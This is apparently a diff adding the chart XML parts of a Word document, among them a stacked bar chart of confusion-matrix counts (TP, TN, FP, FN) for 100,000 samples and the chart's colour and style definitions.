+            <a:solidFill>
+              <a:schemeClr val="dk1">
+                <a:lumMod val="15000"/>
+                <a:lumOff val="85000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:round/>
+          </a:ln>
+          <a:effectLst/>
+        </c:spPr>
+        <c:txPr>
+          <a:bodyPr rot="-60000000" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="65000"/>
+                    <a:lumOff val="35000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:endParaRPr lang="hu-HU"/>
+          </a:p>
+        </c:txPr>
+        <c:crossAx val="15898480"/>
+        <c:crosses val="autoZero"/>
+        <c:auto val="1"/>
+        <c:lblAlgn val="ctr"/>
+        <c:lblOffset val="100"/>
+        <c:noMultiLvlLbl val="0"/>
+      </c:catAx>
+      <c:valAx>
+        <c:axId val="15898480"/>
+        <c:scaling>
+          <c:orientation val="minMax"/>
+        </c:scaling>
+        <c:delete val="0"/>
+        <c:axPos val="l"/>
+        <c:majorGridlines>
+          <c:spPr>
+            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="15000"/>
+                  <a:lumOff val="85000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:round/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+        </c:majorGridlines>
+        <c:numFmt formatCode="General" sourceLinked="1"/>
+        <c:majorTickMark val="none"/>
+        <c:minorTickMark val="none"/>
+        <c:tickLblPos val="nextTo"/>
+        <c:spPr>
+          <a:noFill/>
+          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+            <a:solidFill>
+              <a:schemeClr val="dk1">
+                <a:lumMod val="15000"/>
+                <a:lumOff val="85000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:round/>
+          </a:ln>
+          <a:effectLst/>
+        </c:spPr>
+        <c:txPr>
+          <a:bodyPr rot="-60000000" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="65000"/>
+                    <a:lumOff val="35000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:endParaRPr lang="hu-HU"/>
+          </a:p>
+        </c:txPr>
+        <c:crossAx val="15898064"/>
+        <c:crosses val="autoZero"/>
+        <c:crossBetween val="between"/>
+      </c:valAx>
+      <c:spPr>
+        <a:pattFill prst="ltDnDiag">
+          <a:fgClr>
+            <a:schemeClr val="dk1">
+              <a:lumMod val="15000"/>
+              <a:lumOff val="85000"/>
+            </a:schemeClr>
+          </a:fgClr>
+          <a:bgClr>
+            <a:schemeClr val="lt1"/>
+          </a:bgClr>
+        </a:pattFill>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+    </c:plotArea>
+    <c:legend>
+      <c:legendPos val="b"/>
+      <c:overlay val="0"/>
+      <c:spPr>
+        <a:noFill/>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+      <c:txPr>
+        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr>
+            <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="65000"/>
+                  <a:lumOff val="35000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:defRPr>
+          </a:pPr>
+          <a:endParaRPr lang="hu-HU"/>
+        </a:p>
+      </c:txPr>
+    </c:legend>
+    <c:plotVisOnly val="1"/>
+    <c:dispBlanksAs val="gap"/>
+    <c:showDLblsOverMax val="0"/>
+  </c:chart>
+  <c:spPr>
+    <a:solidFill>
+      <a:schemeClr val="lt1"/>
+    </a:solidFill>
+    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+      <a:solidFill>
+        <a:schemeClr val="dk1">
+          <a:lumMod val="15000"/>
+          <a:lumOff val="85000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:round/>
+    </a:ln>
+    <a:effectLst/>
+  </c:spPr>
+  <c:txPr>
+    <a:bodyPr/>
+    <a:lstStyle/>
+    <a:p>
+      <a:pPr>
+        <a:defRPr/>
+      </a:pPr>
+      <a:endParaRPr lang="hu-HU"/>
+    </a:p>
+  </c:txPr>
+  <c:externalData r:id="rId4">
+    <c:autoUpdate val="0"/>
+  </c:externalData>
+</c:chartSpace>
+</file>
+
+<file path=word/charts/chart2.xml><?xml version="1.0" encoding="utf-8"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:c16r2="http://schemas.microsoft.com/office/drawing/2015/06/chart">
+  <c:date1904 val="0"/>
+  <c:lang val="hu-HU"/>
+  <c:roundedCorners val="0"/>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
+    <mc:Choice xmlns:c14="http://schemas.microsoft.com/office/drawing/2007/8/2/chart" Requires="c14">
+      <c14:style val="102"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <c:style val="2"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
+  <c:clrMapOvr bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
+  <c:chart>
+    <c:title>
+      <c:tx>
+        <c:rich>
+          <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="50000"/>
+                    <a:lumOff val="50000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="hu-HU"/>
+              <a:t>Confusion matrix for 100000 samples</a:t>
+            </a:r>
+          </a:p>
+        </c:rich>
+      </c:tx>
+      <c:overlay val="0"/>
+      <c:spPr>
+        <a:noFill/>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+      <c:txPr>
+        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr>
+            <a:defRPr sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="50000"/>
+                  <a:lumOff val="50000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:latin typeface="+mj-lt"/>
+              <a:ea typeface="+mj-ea"/>
+              <a:cs typeface="+mj-cs"/>
+            </a:defRPr>
+          </a:pPr>
+          <a:endParaRPr lang="hu-HU"/>
+        </a:p>
+      </c:txPr>
+    </c:title>
+    <c:autoTitleDeleted val="0"/>
+    <c:plotArea>
+      <c:layout/>
+      <c:barChart>
+        <c:barDir val="col"/>
+        <c:grouping val="stacked"/>
+        <c:varyColors val="0"/>
+        <c:ser>
+          <c:idx val="0"/>
+          <c:order val="0"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$G$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>TP</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="75000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$G$3:$G$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>42532</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>47370</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>42548</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>41702</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>45274</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>42446</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>42668</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>48750</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>40254</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>49164</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000000-09DB-4368-A274-4C1DF74EEA36}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="1"/>
+          <c:order val="1"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$H$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>TN</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="40000"/>
+                <a:lumOff val="60000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$H$3:$H$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>7397</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>2581</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>7377</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>8261</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>4692</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>7539</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>7333</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>1197</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>8682</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>761</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000001-09DB-4368-A274-4C1DF74EEA36}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="2"/>
+          <c:order val="2"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$I$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>FP</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="20000"/>
+                <a:lumOff val="80000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$I$3:$I$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>1710</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>16777</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>6492</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>7485</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>8893</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>8769</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>3488</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>3133</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>4501</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>3376</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000002-09DB-4368-A274-4C1DF74EEA36}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:ser>
+          <c:idx val="3"/>
+          <c:order val="3"/>
+          <c:tx>
+            <c:strRef>
+              <c:f>Munka1!$J$2</c:f>
+              <c:strCache>
+                <c:ptCount val="1"/>
+                <c:pt idx="0">
+                  <c:v>FN</c:v>
+                </c:pt>
+              </c:strCache>
+            </c:strRef>
+          </c:tx>
+          <c:spPr>
+            <a:solidFill>
+              <a:schemeClr val="accent1">
+                <a:lumMod val="60000"/>
+                <a:lumOff val="40000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+          <c:invertIfNegative val="0"/>
+          <c:val>
+            <c:numRef>
+              <c:f>Munka1!$J$3:$J$12</c:f>
+              <c:numCache>
+                <c:formatCode>General</c:formatCode>
+                <c:ptCount val="10"/>
+                <c:pt idx="0">
+                  <c:v>48261</c:v>
+                </c:pt>
+                <c:pt idx="1">
+                  <c:v>33172</c:v>
+                </c:pt>
+                <c:pt idx="2">
+                  <c:v>43483</c:v>
+                </c:pt>
+                <c:pt idx="3">
+                  <c:v>42425</c:v>
+                </c:pt>
+                <c:pt idx="4">
+                  <c:v>41041</c:v>
+                </c:pt>
+                <c:pt idx="5">
+                  <c:v>41146</c:v>
+                </c:pt>
+                <c:pt idx="6">
+                  <c:v>46411</c:v>
+                </c:pt>
+                <c:pt idx="7">
+                  <c:v>46820</c:v>
+                </c:pt>
+                <c:pt idx="8">
+                  <c:v>45463</c:v>
+                </c:pt>
+                <c:pt idx="9">
+                  <c:v>46599</c:v>
+                </c:pt>
+              </c:numCache>
+            </c:numRef>
+          </c:val>
+          <c:extLst>
+            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
+              <c16:uniqueId val="{00000003-09DB-4368-A274-4C1DF74EEA36}"/>
+            </c:ext>
+          </c:extLst>
+        </c:ser>
+        <c:dLbls>
+          <c:showLegendKey val="0"/>
+          <c:showVal val="0"/>
+          <c:showCatName val="0"/>
+          <c:showSerName val="0"/>
+          <c:showPercent val="0"/>
+          <c:showBubbleSize val="0"/>
+        </c:dLbls>
+        <c:gapWidth val="150"/>
+        <c:overlap val="100"/>
+        <c:axId val="1961956160"/>
+        <c:axId val="1961953664"/>
+      </c:barChart>
+      <c:catAx>
+        <c:axId val="1961956160"/>
+        <c:scaling>
+          <c:orientation val="minMax"/>
+        </c:scaling>
+        <c:delete val="0"/>
+        <c:axPos val="b"/>
+        <c:majorGridlines>
+          <c:spPr>
+            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="15000"/>
+                  <a:lumOff val="85000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:round/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+        </c:majorGridlines>
+        <c:numFmt formatCode="General" sourceLinked="1"/>
+        <c:majorTickMark val="none"/>
+        <c:minorTickMark val="none"/>
+        <c:tickLblPos val="nextTo"/>
+        <c:spPr>
+          <a:noFill/>
+          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+            <a:solidFill>
+              <a:schemeClr val="dk1">
+                <a:lumMod val="15000"/>
+                <a:lumOff val="85000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:round/>
+          </a:ln>
+          <a:effectLst/>
+        </c:spPr>
+        <c:txPr>
+          <a:bodyPr rot="-60000000" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="65000"/>
+                    <a:lumOff val="35000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:endParaRPr lang="hu-HU"/>
+          </a:p>
+        </c:txPr>
+        <c:crossAx val="1961953664"/>
+        <c:crosses val="autoZero"/>
+        <c:auto val="1"/>
+        <c:lblAlgn val="ctr"/>
+        <c:lblOffset val="100"/>
+        <c:noMultiLvlLbl val="0"/>
+      </c:catAx>
+      <c:valAx>
+        <c:axId val="1961953664"/>
+        <c:scaling>
+          <c:orientation val="minMax"/>
+          <c:max val="100000"/>
+        </c:scaling>
+        <c:delete val="0"/>
+        <c:axPos val="l"/>
+        <c:majorGridlines>
+          <c:spPr>
+            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="15000"/>
+                  <a:lumOff val="85000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:round/>
+            </a:ln>
+            <a:effectLst/>
+          </c:spPr>
+        </c:majorGridlines>
+        <c:numFmt formatCode="General" sourceLinked="1"/>
+        <c:majorTickMark val="none"/>
+        <c:minorTickMark val="none"/>
+        <c:tickLblPos val="nextTo"/>
+        <c:spPr>
+          <a:noFill/>
+          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+            <a:solidFill>
+              <a:schemeClr val="dk1">
+                <a:lumMod val="15000"/>
+                <a:lumOff val="85000"/>
+              </a:schemeClr>
+            </a:solidFill>
+            <a:round/>
+          </a:ln>
+          <a:effectLst/>
+        </c:spPr>
+        <c:txPr>
+          <a:bodyPr rot="-60000000" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
+                <a:solidFill>
+                  <a:schemeClr val="dk1">
+                    <a:lumMod val="65000"/>
+                    <a:lumOff val="35000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:endParaRPr lang="hu-HU"/>
+          </a:p>
+        </c:txPr>
+        <c:crossAx val="1961956160"/>
+        <c:crosses val="autoZero"/>
+        <c:crossBetween val="between"/>
+      </c:valAx>
+      <c:spPr>
+        <a:pattFill prst="ltDnDiag">
+          <a:fgClr>
+            <a:schemeClr val="dk1">
+              <a:lumMod val="15000"/>
+              <a:lumOff val="85000"/>
+            </a:schemeClr>
+          </a:fgClr>
+          <a:bgClr>
+            <a:schemeClr val="lt1"/>
+          </a:bgClr>
+        </a:pattFill>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+    </c:plotArea>
+    <c:legend>
+      <c:legendPos val="b"/>
+      <c:overlay val="0"/>
+      <c:spPr>
+        <a:noFill/>
+        <a:ln>
+          <a:noFill/>
+        </a:ln>
+        <a:effectLst/>
+      </c:spPr>
+      <c:txPr>
+        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
+        <a:lstStyle/>
+        <a:p>
+          <a:pPr>
+            <a:defRPr sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
+              <a:solidFill>
+                <a:schemeClr val="dk1">
+                  <a:lumMod val="65000"/>
+                  <a:lumOff val="35000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:defRPr>
+          </a:pPr>
+          <a:endParaRPr lang="hu-HU"/>
+        </a:p>
+      </c:txPr>
+    </c:legend>
+    <c:plotVisOnly val="1"/>
+    <c:dispBlanksAs val="gap"/>
+    <c:showDLblsOverMax val="0"/>
+  </c:chart>
+  <c:spPr>
+    <a:solidFill>
+      <a:schemeClr val="lt1"/>
+    </a:solidFill>
+    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+      <a:solidFill>
+        <a:schemeClr val="dk1">
+          <a:lumMod val="15000"/>
+          <a:lumOff val="85000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:round/>
+    </a:ln>
+    <a:effectLst/>
+  </c:spPr>
+  <c:txPr>
+    <a:bodyPr/>
+    <a:lstStyle/>
+    <a:p>
+      <a:pPr>
+        <a:defRPr/>
+      </a:pPr>
+      <a:endParaRPr lang="hu-HU"/>
+    </a:p>
+  </c:txPr>
+  <c:externalData r:id="rId4">
+    <c:autoUpdate val="0"/>
+  </c:externalData>
+</c:chartSpace>
+</file>
+
+<file path=word/charts/colors1.xml><?xml version="1.0" encoding="utf-8"?>
+<cs:colorStyle xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" meth="withinLinear" id="14">
+  <a:schemeClr val="accent1"/>
+</cs:colorStyle>
+</file>
+
+<file path=word/charts/colors2.xml><?xml version="1.0" encoding="utf-8"?>
+<cs:colorStyle xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" meth="cycle" id="10">
+  <a:schemeClr val="accent1"/>
+  <a:schemeClr val="accent2"/>
+  <a:schemeClr val="accent3"/>
+  <a:schemeClr val="accent4"/>
+  <a:schemeClr val="accent5"/>
+  <a:schemeClr val="accent6"/>
+  <cs:variation/>
+  <cs:variation>
+    <a:lumMod val="60000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="80000"/>
+    <a:lumOff val="20000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="80000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="60000"/>
+    <a:lumOff val="40000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="50000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="70000"/>
+    <a:lumOff val="30000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="70000"/>
+  </cs:variation>
+  <cs:variation>
+    <a:lumMod val="50000"/>
+    <a:lumOff val="50000"/>
+  </cs:variation>
+</cs:colorStyle>
+</file>
+
+<file path=word/charts/style1.xml><?xml version="1.0" encoding="utf-8"?>
+<cs:chartStyle xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" id="303">
+  <cs:axisTitle>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" b="1" kern="1200"/>
+  </cs:axisTitle>
+  <cs:categoryAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0"/>
+  </cs:categoryAxis>
+  <cs:chartArea>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:chartArea>
+  <cs:dataLabel>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="75000"/>
+        <a:lumOff val="25000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:dataLabel>
+  <cs:dataLabelCallout>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln>
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="25000"/>
+            <a:lumOff val="75000"/>
+          </a:schemeClr>
+        </a:solidFill>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+    <cs:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="clip" horzOverflow="clip" vert="horz" wrap="square" lIns="36576" tIns="18288" rIns="36576" bIns="18288" anchor="ctr" anchorCtr="1">
+      <a:spAutoFit/>
+    </cs:bodyPr>
+  </cs:dataLabelCallout>
+  <cs:dataPoint>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:dataPoint>
+  <cs:dataPoint3D>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:dataPoint3D>
+  <cs:dataPointLine>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="22225" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
